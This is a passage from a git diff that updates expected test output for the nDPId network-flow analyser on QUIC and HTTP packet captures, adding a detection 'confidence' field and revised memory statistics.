hz3k5MC2zTm67IILY1heZ2AuYvQwYQOss3bJtjPNa+uV1pVbQiVw6S2nvxKgtq5Z9DSuXhvsbTOp5GSq1YV0eewMUT6nB6ejScFWGv+XM50Rf10iuSgO6pXznyY29qMMOcdfxFMWk8ZhEALkKLXeqjM+FjHgPqVYhtjd0Mxa3xCi4pEnff1YF4nj78KYHZrV2zxl6ihclVVh4iHXNFGI+s63vsFXEOTBejfPsr6+VmTDJ1+o1kNk93XUE\/bQ82a18NJPdXQ6kf26Qjcc4RqnTvAmrWh\/6fmG4zIriY7A9z8t4eO9Qfr9TLO3k0B5JOVnWVTqlbOvrJgEzV95Hv0ioO0xIj5BnxrbLnlwbNfPjVGTcRNAh71gU32J8rr6rCxxCaTv4RU7KdiQ+zigC0LKK7x4OPs9n2Ka2KUPy25mrLQ\/hk5IjtzsrqqQ2MzNcZhxb0kkNCxELzOQUMbpkFnw3XGvEDCJVplyR1UqjiDFOL8\/JfuephE1oyHWeOYVwVd2Cwv2PGGx05T5JJWiwFxWUNPRdBpTvDS0w\/p4Nd\/c2GPaorYCv1rEFAbYJpF4F6I30H8WeSXKzzhCDJKK0+cDwsUjqsSRJxU4ftS+uYB0XeJmKhKFuSfMEVI0q1YpMQZE\/G2MC4zAighNsEoUwNwWYS2545Iu3+Eegoe47B\/k8tCSheavZoHCQ6GLnzYKEdctMGvZqMVOXsPQnYlobmVfhCoHYAqTL++rI+V2XgKmzpdEDycwwsSLkVWoYU4lGAoPMP3kxasfCnUHU\/V6gkc7C3bskka9cplZd3pC0DtI8Ams8W1VIknYpHJDhbirGSRTc6oJbJQK8NbF0mBg+7QAzF7Cg20VSPH1oCq1EEodwhHlQBTHEkDIUOOWm8A2kePv2bx2BTxVuCDz2D78zh51"}
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/86.0.4240.9 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T051","ja3":"92e76078d514999cd950474995dab2b5","tls_supported_versions":"TLSv1.3"}}
+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/86.0.4240.9 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T051","ja3":"92e76078d514999cd950474995dab2b5","tls_supported_versions":"TLSv1.3"}}
 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1598620434419,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1598620434419,"pkt":"AAAAAAAAAAIA\/tPQCABFAAViAABAADcRkr3T95Nau+OImAG72DwFTvx1wFQwNTEACP+UFbWwBYYNAEU0cA7ob5DRu6SNsqDMEz7qri8UnfijZV8Hhw\/oxky0x+Zt0s6erWm7kWn2+1owrYTdI9p89OpW\/6ptpwv9v0J5BjJyyLuuQ7qMgzGXDs2ur++juUsUpOdkAs5K5BYVfQAmPmXEGyVgmyCeUg1T7Vj6FslmnDV909IngQqr2X3bAL3as4fB8O0bAq64I2nnjXRSsXtOF+WecFDOIkhsUozc+8M2nJh6kczAN6BO7Q6B24T4pTF7f\/SWotAh0wmioZGWvmsK3tbjrCGONmSc7G6EA+eCMtEUY\/yq8VyKOSmIHald\/L7JGCPyNYCQuoSWiWNaW\/I+iZ2Tm83YJ0ULZZc8urwFDYH3aj1AkglwflqENARW1+\/0Wgf8CdNT18FiabAis+X7vPL\/K0rfVmIy72rlRNRfOG7y7nzx1KwQOQc8aCVF3CWYU+Lmd10cKRMsTRDen+t7CfJT6D6czKmRS9zHy8defw2VL+sr4ea6knMol1lydS5om9MxXCYpqegXuWZiFTSbzJvhE4RaqOqWqlC3CyDO4ySp0wcYRr6Xiz\/ypHsBLBgujZNocUdxB92srmLhWvU+EKXNqnvn4sN9tP\/B4VI81UNJfpKqafd5TbC3xVerPG2FpOE4rg1k2rQi9r6v1+PQ\/d3R0LlFcbJ1hI9fgnNKZUfeIejFNzw84ZCPAGKEZF9DRij\/q7+ynKTHsKprl5SyrzqmDatgR6jPni4YdUIipVxz2xAMDSfgGHJudxWet0g70XvUgRUnZwnINCVHKug\/Cwaar4s1XCM8uhzoEef40bHIf\/1cPPikcn5BGvUj0yq5vKOgKlUAn1Pgd3RmxD4udRVK4hr3Qq2qz0yzGHjPkF5V31PdO+LbljCDil0atM9nNzYRQDTxXIy4ROBhbRF0GC5xxy\/5G1Z3EVEXnUgV7cKAoSoRYsJk+ehBddHi\/2\/aZLTP9GUgaj03e1ZAUqg\/pLbgzkOggtkBYwlEystem00J3RiW59azSXPWDzpQD37GvUqWpvchJjuAPROhp0eQOeyP6Sm5m8Ha1f9MDT\/mDWqN\/iBuFORPOJebKiYDmtBTotFqfXW1txgynw6EHUJzSE+pl4MdTTWGiKeLLjK6VcgkjK3QCvZi2YAV34jHwjHZGw2P\/U6KrMCfYoKLgcta7eGwEJgt1TEOATVA86YdSNrUK8Cm6qplxo7u2vCTdHfHERZHXlWiV5V+M6yg8jJ+w71hYe+9QRnWDWxxhFwqS3Rom5NgfL3qyZPAg7B0TvVcGC3k1t2hVxdIBJT1YLB9P8xcq205KojLAkrnJ6A03YtC2cE+\/GfTI6rrSdcn22uQHH1uwQgPFlvo5F8SRGnmtqbBCoQkhDA10opFpEUHAKVRysF1xT\/NgfiMQHD+An4IrPRfuv9gDg0rUkwJww22wh5gLlRkZ\/Syy5BClTzH9Eje2q1QlkG4NyNIdxlgTeTWfrV+owYm4Q+FXDFSqiziTTjYt929oBaNekN7DaLZNKBHzE9aRpnZjKaGJOIkilbSRnfMsOP+KhOdyxkYqJB7lgyVuE7zA+Cs6QfiNfeFBdysqGJcMLaCJe1XQZYseYZCHv9I1fYRd7rHJDJ5TLxG9ZoKBvyy9qAFruCnQdJM3kRJUF0ZdxtTsL1YtSrJYqn3hcGRfsN64Wu2ioNCdgwzJ\/IOr225URP0O\/yfvAjNTo393KgekGIplrSAr2vqB7j6oyQmlBJgPRuYDzTKmIMBKNHRY+Gk4U31TV\/ldcN5g5htDYX20DA3i7tEfKzfbUYY"}
 02260{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1598620434482,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1598620434482,"pkt":"AAAAAAAAAAgAH83gCABFAAViXl9AAH8R7F2744iY0\/eTWtg8AbsFTtamzVQwNTEI\/5QVtbAFhg0AAEU0KsIg8w2st8fMy25uq6gsPA7KRO4wWARaQxn0e+nvMAG\/ncVOK2\/1iV8zM1GT+gj2yfRnYitTLViCwPF0TV0R7p64xnLqwrHTiNaW89JgMAHQze00LP7FiTbOvqpo5S+7AzCO4J36LH8gasnIPNye5ytyGP9hxarM0Gwv6wB1BKIgh6Hfi9vN\/Jaq\/hKaWtnsFyqFx21T1U0YmQzCOhcYGHZNHNGEmxqlfOiET0cy7A2zooythTNQBScefWz4fyugA0KO5z5EPbOCuLPnOhJ8u0jAA5snZ9Av4lfTCNurCTo\/b96gqEMXFCAN6kklskS6mSW1P2yxo93FRN9w3VFPyMe8m7WnAxPUMrijM3bZFrpYXz6N3LoSvj\/7t1mbaz3Ew6W7CCET2\/vUPuty0yYuKN9hlZRGZDAOI7p7UV84zBa3MKUoIB90BBwtqXlv\/AcyfRFhSrAf1TPDIen8IRojBr5qTqwwDIcvMREVIsmeXYDDAIh87njz+3l6UiC0r72z0Vz8KlwPmvyd1tNbK4UoVu5yliqV7BzHAT0P+flRjAVL+Vtw\/1eTO0KLmizThDqycqyAF1MjS6cC4BRlgBDuBvC7oqizuHTk4JOICP+TLa71t9U0MO4SvptmKRFy9UA159ziHHDRbAhIzzVEm+HGxTjT93PUzlkT4beWAgYYW5swcH8m2E+qX\/jfh4l+RAJ7s1FC99eqQD\/G2qHKz49sTvtw3eknSSHiADw1dFNDiGytHeAJqgKsYZ6xbxYgMT8vQQJWpcCaoPnc1R\/36QBSKDfO0Ei6I0Nk2Twp2jW7ybYg3WV9zcO8mcO+t2rUANioNNaghKiQ6\/\/kCvnfaOZl9\/nMaaP8oRI80YNnM3bBLePCUoIodPlfRsS+qRORwVaYVbmTkVd+7OOE68KIf+CtQJzWPG1I9szX6EUokwcVW4JeKB3DLXSgUJqbrCp8nB5Gt1Xl+DVmAWNn0zlmAkUkIYwVaRlUBt12nmZM5GfCFjeNYwyxKhMtco0zqNoFh6GPimEo\/HJoIaculB01PGh4MlKE33m6lcbQnV2mcjQy9+X6G7gJAvssvNVim+h2CyUIa0AFnvBEp0BZ0LQBw4xxW1+LO+851oEKlpBHf2CaPTJQbQ3lYLcFUbbZ7WxtncvtHzy\/SI9UgKeWcagnCcsYLbPsnPnloEl6cnUj6vnGVoFZ0zI4TVPk88\/biBoFXX37AYSAsISWoXJh5fdyK7Ub3uTshAtqeqBBTUeUFjb5Aj4cdCLyefeqdX7eVX7iolZTDjMHw6WHcQg9j8QT5ZehE6eQ3EWBv\/dyJkxi+P\/\/5RRqzAOol5xZb6h4LuhsvzWHQihAaP9MzFNZJKsrSoe\/spLPEQi09YKZ53xMfFjPTNozP7awNtIb6QltDJNIByFfslEQklWBp3nSDDraHwFBspLwhrXO\/4KJq80I0e6UvL2AGkUJ3WcnYVtrSbxxk4APJ7JesOtrVvfG0zUeYMWMSCdfwkF4KodqZGtJ3QATjzBea+nTD5uHk34dDyJnSJKk0ILq0jIFLho8LlWIyJH4QOXOz4qaWrv1Yq7zohspvZk7qqBfzWtq9nyRWQ1TZln6OTuRj1nSwDkH3Qwyv3P3ftVCIjgLduzJ1KxoPir\/gAp5xz8YWBMXoD3IJzkv\/PGQNpizq54tSdx\/+EwNQ0FXkMrTDVKVITAuSnBIkg9sH6JW+WpNYsbAPv3JnEFyzt8fIeM\/r0Qmf+N6zxgE9jaSg9C2Ue6YSiQO2VAdyYTxTvnFaxwR"}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":642,"flow_first_seen":1598620434413,"flow_last_seen":1598620524479,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":546754,"flow_avg_l4_payload_len":851,"midstream":0,"ts_msec":1598620524479,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":642,"flow_first_seen":1598620434413,"flow_last_seen":1598620524479,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":546754,"flow_avg_l4_payload_len":851,"midstream":0,"ts_msec":1598620524479,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 642/642
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4619019 bytes
-~~ total memory freed........: 4619019 bytes
-~~ total allocations/frees...: 100208/100208
+~~ total memory allocated....: 4703972 bytes
+~~ total memory freed........: 4703972 bytes
+~~ total allocations/frees...: 101798/101798
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 2265 chars
diff --git a/test/results/quickplay.pcap.out b/test/results/quickplay.pcap.out
index bce1dd69d..0974e771a 100644
--- a/test/results/quickplay.pcap.out
+++ b/test/results/quickplay.pcap.out
@@ -1,121 +1,121 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quickplay.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00866{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="}
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 02230{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"ts_msec":1429000030498,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVSmuUAArQbSWHgcIykKNqn6AFDF7PrHCIFBw4oPUBgIIgJuAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="}
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 02230{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"ts_msec":1429000030832,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVReB0AArQYbC3gcIykKNqn6AFDF7RGY8YXnovU2UBgIIvGQAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1T